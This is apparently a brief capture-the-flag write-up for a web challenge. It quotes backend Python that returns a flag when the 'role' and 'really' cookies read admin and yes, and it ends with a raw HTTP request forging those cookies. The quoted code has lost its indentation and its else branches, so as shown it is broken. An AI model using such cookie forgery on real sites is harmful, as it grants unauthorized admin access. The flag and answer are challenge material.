Flag: `ENO{R3Qu3sts_4r3_s0m3T1m3s_we1rd_dont_get_confused}`

Going to the ip provided we get this

Usage: Look at the code ;-)

Overwriting cookies with default value! This must be secure!
Prepared request cookies are: [('role', 'guest')]
Sending request...
Request cookies are: [('role', 'guest')]

Response is: Guest: Nope

And looking at the backend we see this

def whoami():
role = request.cookies.get('role','guest')
really = request.cookies.get('really', 'no')
if role == 'admin':
if really == 'yes':
resp = 'Admin: ' + os.environ['FLAG']
resp = 'Guest: Nope'
resp = 'Guest: Nope'
return Response(resp, mimetype='text/plain')


So we have to provide a cookie with `role=admin` and `really=yes` and it will give us the flag

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: role=admin;really=yes
Upgrade-Insecure-Requests: 1